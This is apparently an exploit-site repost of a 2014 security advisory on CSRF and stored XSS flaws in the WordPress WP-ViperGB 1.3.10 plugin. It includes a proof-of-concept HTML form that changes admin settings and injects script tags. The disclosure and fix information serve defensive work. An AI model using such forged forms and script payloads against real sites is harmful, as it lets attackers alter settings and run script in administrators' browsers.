Home / exploits WordPress WP-ViperGB 1.3.10 CSRF / XSS
Posted on 13 December 2014
Title: WordPress 'WP-ViperGB' plugin - CSRF/XSS Version: 1.3.10 Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej Date: 2014/12/12 Download: https://wordpress.org/plugins/wp-vipergb/ Notified WordPress: 2014/11/27 ---------------------------------------------------------------- ## Description: ---------------------------------------------------------------- WP-ViperGB is a WordPress plugin designed to replicate the appearance and behavior of the discontinued Viper Guestbook project. It makes it easy to add a stylish and user-friendly guestbook to your blog. ## CSRF: ---------------------------------------------------------------- It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page. ## Stored XSS: ---------------------------------------------------------------- Some settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields. PoC: Log in as admin to the vulnerable site and press the submit button on this form: <form method="POST" action="http://vuln.site/wp-admin/options-general.php?page=wp-vipergb"> <input type="text" name="vgb_page" value="0"/><script>alert(1);</script>"><br /> <input type="text" name="vgb_style" value="Default"><br /> <input type="text" name="vgb_items_per_pg" value="100"/><script>alert(2);</script>"><br /> <input type="text" name="vgb_show_browsers" value="1"><br /> <input type="text" name="vgb_show_flags" value="1"><br /> <input type="text" name="opts_updated" value="1"><br /> <input type="text" name="Submit" value="Save"><br /> <input type="submit"> </form> ## Solution ---------------------------------------------------------------- Update to version 1.3.11
